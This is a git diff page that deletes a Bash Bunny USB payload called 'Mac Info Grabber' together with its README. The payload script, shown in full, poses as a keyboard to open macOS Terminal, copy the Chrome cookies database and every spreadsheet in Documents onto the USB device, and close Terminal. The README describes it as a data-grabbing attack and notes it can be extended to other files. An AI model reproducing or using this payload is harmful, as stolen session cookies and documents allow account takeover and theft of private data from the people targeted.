pull/27/head
parent
4af04427aa
commit
0f2a390fb1
|
@ -1,33 +0,0 @@
|
|||
LED R
|
||||
ATTACKMODE HID STORAGE
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 8000
|
||||
QUACK STRING mkdir -p /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/chromecookies.db
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK GUI q
|
||||
QUACK DELAY 500
|
||||
QUACK ENTER
|
||||
|
||||
# Green LED for finished
|
||||
LED G
|
||||
|
||||
files=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
|
||||
files2=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
|
||||
if [ "$files" != "0" -o "$files2" != "0"]
|
||||
then
|
||||
# Got spreadsheet files
|
||||
LED R B
|
||||
else
|
||||
LED R
|
||||
# No spread sheets
|
||||
fi
|
|
@ -1,20 +0,0 @@
|
|||
# Mac Info Grabber for the BashBunny
|
||||
|
||||
* Author: kmakblob
|
||||
* Version: Version 1.0
|
||||
* Target: OSX
|
||||
|
||||
## Description
|
||||
|
||||
A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
|
||||
the Documents folder and places them inside a folder on the BashBunny called MacLoot.
|
||||
|
||||
This payload can be easily modified to grab other files like word docs or csv files.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Green | Attack Finished |
|
||||
| Purple | Successfully grabbed xls or xlsx files |
|
||||
| RED | Did not get any xls or xlsx files |
|
Loading…
Reference in New Issue